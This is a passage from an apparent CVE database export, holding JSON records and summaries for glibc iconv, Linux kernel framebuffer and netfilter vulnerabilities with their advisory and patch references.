"https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42383", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.425Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2016-10228
Vulnerability from cvelistv5
Published
2017-03-02 00:00
Modified
2024-08-06 03:14
Severity ?
EPSS score ?
Summary
The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T03:14:42.874Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "96525", "tags": [ "vdb-entry", "x_transferred" ], "url": "http://www.securityfocus.com/bid/96525" }, { "name": "GLSA-202101-20", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519" }, { "tags": [ "x_transferred" ], "url": "http://openwall.com/lists/oss-security/2017/03/01/10" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-03-01T00:00:00", "descriptions": [ { "lang": "en", "value": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "96525", "tags": [ "vdb-entry" ], "url": "http://www.securityfocus.com/bid/96525" }, { "name": "GLSA-202101-20", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" }, { "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519" }, { "url": "http://openwall.com/lists/oss-security/2017/03/01/10" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2016-10228", "datePublished": "2017-03-02T00:00:00", "dateReserved": "2017-03-01T00:00:00", "dateUpdated": "2024-08-06T03:14:42.874Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-33655
Vulnerability from cvelistv5
Published
2022-07-18 14:45
Modified
2024-08-03 23:58
Severity ?
EPSS score ?
Summary
When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.
References
▼ | URL | Tags |
---|---|---|
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4 | x_refsource_MISC | |
http://www.openwall.com/lists/oss-security/2022/07/19/2 | mailing-list, x_refsource_MLIST | |
https://www.debian.org/security/2022/dsa-5191 | vendor-advisory, x_refsource_DEBIAN | |
https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html | mailing-list, x_refsource_MLIST |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T23:58:22.899Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4" }, { "name": "[oss-security] 20220719 CVE-2021-33655: Linux kernel: When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.(5.18 5.19.0-rc1)", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/19/2" }, { "name": "DSA-5191", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5191" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "5.18 5.19.0-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787: Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-02T18:06:20", "orgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2", "shortName": "openEuler" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4" }, { "name": "[oss-security] 20220719 CVE-2021-33655: Linux kernel: When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.(5.18 5.19.0-rc1)", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/19/2" }, { "name": "DSA-5191", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5191" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "securities@openeuler.org", "ID": "CVE-2021-33655", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "kernel", "version": { "version_data": [ { "version_value": "5.18 5.19.0-rc1" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-787: Out-of-bounds Write" } ] } ] }, "references": { "reference_data": [ { "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4", "refsource": "MISC", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=086ff84617185393a0bbf25830c4f36412a7d3f4" }, { "name": "[oss-security] 20220719 CVE-2021-33655: Linux kernel: When sending malicous data to kernel by ioctl cmd FBIOPUT_VSCREENINFO,kernel will write memory out of bounds.(5.18 5.19.0-rc1)", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/07/19/2" }, { "name": "DSA-5191", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5191" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" } ] } } } }, "cveMetadata": { "assignerOrgId": "7e1ac599-2767-43fa-b3ea-f10178cc98f2", "assignerShortName": "openEuler", "cveId": "CVE-2021-33655", "datePublished": "2022-07-18T14:45:50", "dateReserved": "2021-05-28T00:00:00", "dateUpdated": "2024-08-03T23:58:22.899Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-32250
Vulnerability from cvelistv5
Published
2022-06-02 20:51
Modified
2024-08-03 07:39
Severity ?
EPSS score ?
Summary
net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T07:39:50.446Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/05/31/1" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/net/netfilter?id=520778042ccca019f3ffa136dd0ca565c486cedd" }, { "name": "[oss-security] 20220603 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/03/1" }, { "name": "[oss-security] 20220604 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/04/1" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MO6Y3TC4WUUNKRP7OQA26OVTZTPCS6F2/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UIZTJOJCVVEJVOQSCHE6IJQKMPISHQ5L/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5161" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092427" }, { "name": "[oss-security] 20220620 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/20/1" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "[oss-security] 20220703 Re: Linux kernel: Netfilter heap buffer overflow: Is this CVE-2022-32250?", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/03/6" }, { "name": "[oss-security] 20220703 Linux kernel: Netfilter heap buffer overflow: Is this CVE-2022-32250?", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/03/5" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0005/" }, { "name": "[oss-security] 20220825 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/08/25/1" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/theori-io/CVE-2022-32250-exploit" }, { "name": "[oss-security] 20220902 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/02/9" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-02T11:06:21", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.openwall.com/lists/oss-security/2022/05/31/1" }, { "tags": [ "x_refsource_MISC" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/net/netfilter?id=520778042ccca019f3ffa136dd0ca565c486cedd" }, { "name": "[oss-security] 20220603 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/03/1" }, { "name": "[oss-security] 20220604 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/04/1" }, { "tags": [ "x_refsource_MISC" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MO6Y3TC4WUUNKRP7OQA26OVTZTPCS6F2/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UIZTJOJCVVEJVOQSCHE6IJQKMPISHQ5L/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.debian.org/security/2022/dsa-5161" }, { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092427" }, { "name": "[oss-security] 20220620 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/06/20/1" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "[oss-security] 20220703 Re: Linux kernel: Netfilter heap buffer overflow: Is this CVE-2022-32250?", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/03/6" }, { "name": "[oss-security] 20220703 Linux kernel: Netfilter heap buffer overflow: Is this CVE-2022-32250?", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/07/03/5" }, { "name": "DSA-5173", "tags": [ "vendor-advisory", "x_refsource_DEBIAN" ], "url": "https://www.debian.org/security/2022/dsa-5173" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0005/" }, { "name": "[oss-security] 20220825 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/08/25/1" }, { "tags": [ "x_refsource_MISC" ], "url": "https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/theori-io/CVE-2022-32250-exploit" }, { "name": "[oss-security] 20220902 Re: Linux Kernel use-after-free write in netfilter", "tags": [ "mailing-list", "x_refsource_MLIST" ], "url": "http://www.openwall.com/lists/oss-security/2022/09/02/9" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2022-32250", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "net/netfilter/nf_tables_api.c in the Linux kernel through 5.18.1 allows a local user (able to create user/net namespaces) to escalate privileges to root because an incorrect NFT_STATEFUL_EXPR check leads to a use-after-free." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.openwall.com/lists/oss-security/2022/05/31/1", "refsource": "MISC", "url": "https://www.openwall.com/lists/oss-security/2022/05/31/1" }, { "name": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/net/netfilter?id=520778042ccca019f3ffa136dd0ca565c486cedd", "refsource": "MISC", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/net/netfilter?id=520778042ccca019f3ffa136dd0ca565c486cedd" }, { "name": "[oss-security] 20220603 Re: Linux Kernel use-after-free write in netfilter", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/06/03/1" }, { "name": "[oss-security] 20220604 Re: Linux Kernel use-after-free write in netfilter", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/06/04/1" }, { "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MO6Y3TC4WUUNKRP7OQA26OVTZTPCS6F2/", "refsource": "MISC", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MO6Y3TC4WUUNKRP7OQA26OVTZTPCS6F2/" }, { "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIZTJOJCVVEJVOQSCHE6IJQKMPISHQ5L/", "refsource": "MISC", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UIZTJOJCVVEJVOQSCHE6IJQKMPISHQ5L/" }, { "name": "https://www.debian.org/security/2022/dsa-5161", "refsource": "MISC", "url": "https://www.debian.org/security/2022/dsa-5161" }, { "name": "https://bugzilla.redhat.com/show_bug.cgi?id=2092427", "refsource": "MISC", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2092427" }, { "name": "[oss-security] 20220620 Re: Linux Kernel use-after-free write in netfilter", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/06/20/1" }, { "name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update", "refsource": "MLIST", "url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html" }, { "name": "[oss-security] 20220703 Re: Linux kernel: Netfilter heap buffer overflow: Is this CVE-2022-32250?", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/07/03/6" }, { "name": "[oss-security] 20220703 Linux kernel: Netfilter heap buffer overflow: Is this CVE-2022-32250?", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/07/03/5" }, { "name": "DSA-5173", "refsource": "DEBIAN", "url": "https://www.debian.org/security/2022/dsa-5173" }, { "name": "https://security.netapp.com/advisory/ntap-20220715-0005/", "refsource": "CONFIRM", "url": "https://security.netapp.com/advisory/ntap-20220715-0005/" }, { "name": "[oss-security] 20220825 Re: Linux Kernel use-after-free write in netfilter", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/08/25/1" }, { "name": "https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/", "refsource": "MISC", "url": "https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/" }, { "name": "https://github.com/theori-io/CVE-2022-32250-exploit", "refsource": "MISC", "url": "https://github.com/theori-io/CVE-2022-32250-exploit" }, { "name": "[oss-security] 20220902 Re: Linux Kernel use-after-free write in netfilter", "refsource": "MLIST", "url": "http://www.openwall.com/lists/oss-security/2022/09/02/9" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2022-32250", "datePublished": "2022-06-02T20:51:34", "dateReserved": "2022-06-02T00:00:00", "dateUpdated": "2024-08-03T07:39:50.446Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-25013
Vulnerability from cvelistv5
Published
2021-01-04 00:00
Modified
2024-08-05 03:00
Severity ?
EPSS score ?
Summary
The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T03:00:18.826Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=ee7a3144c9922808181009b7b3e50e852fb4999b" }, { "name": "FEDORA-2021-6feb090c97", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/" }, { "name": "FEDORA-2021-6e581c051a", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" }, { "name": "[kafka-dev] 20210420 [jira] [Created] (KAFKA-12698) CVE-2019-25013 vulnerability reported in Kafka", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7%40%3Cdev.kafka.apache.org%3E" }, { "name": "[kafka-jira] 20210420 [jira] [Created] (KAFKA-12698) CVE-2019-25013 vulnerability reported in Kafka", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f%40%3Cjira.kafka.apache.org%3E" }, { "name": "[kafka-jira] 20210423 [jira] [Commented] (KAFKA-12698) CVE-2019-25013 high priority vulnerability reported in Kafka", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9%40%3Cjira.kafka.apache.org%3E" }, { "name": "[zookeeper-issues] 20210423 [jira] [Created] (ZOOKEEPER-4285) High CVE-2019-25013 reported by Clair scanner for Zookeeper 3.6.1", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece%40%3Cissues.zookeeper.apache.org%3E" }, { "name": "[zookeeper-dev] 20210423 [jira] [Created] (ZOOKEEPER-4285) High CVE-2019-25013 reported by Clair scanner for Zookeeper 3.6.1", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc%40%3Cdev.zookeeper.apache.org%3E" }, { "name": "[kafka-jira] 20210423 [jira] [Updated] (KAFKA-12698) CVE-2019-25013 high priority vulnerability reported in Kafka", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff%40%3Cjira.kafka.apache.org%3E" }, { "name": "[kafka-jira] 20210423 [jira] [Comment Edited] (KAFKA-12698) CVE-2019-25013 high priority vulnerability reported in Kafka", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2%40%3Cjira.kafka.apache.org%3E" }, { "name": "[zookeeper-issues] 20210506 [jira] [Resolved] (ZOOKEEPER-4285) High CVE-2019-25013 reported by Clair scanner for Zookeeper 3.6.1", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c%40%3Cissues.zookeeper.apache.org%3E" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20210205-0004/" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973" }, { "url": "https://sourceware.org/git/?p=glibc.git%3Ba=commit%3Bh=ee7a3144c9922808181009b7b3e50e852fb4999b" }, { "name": "FEDORA-2021-6feb090c97", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/" }, { "name": "FEDORA-2021-6e581c051a", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/" }, { "name": "[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E" }, { "name": "[kafka-dev] 20210420 [jira] [Created] (KAFKA-12698) CVE-2019-25013 vulnerability reported in Kafka", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7%40%3Cdev.kafka.apache.org%3E" }, { "name": "[kafka-jira] 20210420 [jira] [Created] (KAFKA-12698) CVE-2019-25013 vulnerability reported in Kafka", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f%40%3Cjira.kafka.apache.org%3E" }, { "name": "[kafka-jira] 20210423 [jira] [Commented] (KAFKA-12698) CVE-2019-25013 high priority vulnerability reported in Kafka", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9%40%3Cjira.kafka.apache.org%3E" }, { "name": "[zookeeper-issues] 20210423 [jira] [Created] (ZOOKEEPER-4285) High CVE-2019-25013 reported by Clair scanner for Zookeeper 3.6.1", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece%40%3Cissues.zookeeper.apache.org%3E" }, { "name": "[zookeeper-dev] 20210423 [jira] [Created] (ZOOKEEPER-4285) High CVE-2019-25013 reported by Clair scanner for Zookeeper 3.6.1", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc%40%3Cdev.zookeeper.apache.org%3E" }, { "name": "[kafka-jira] 20210423 [jira] [Updated] (KAFKA-12698) CVE-2019-25013 high priority vulnerability reported in Kafka", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff%40%3Cjira.kafka.apache.org%3E" }, { "name": 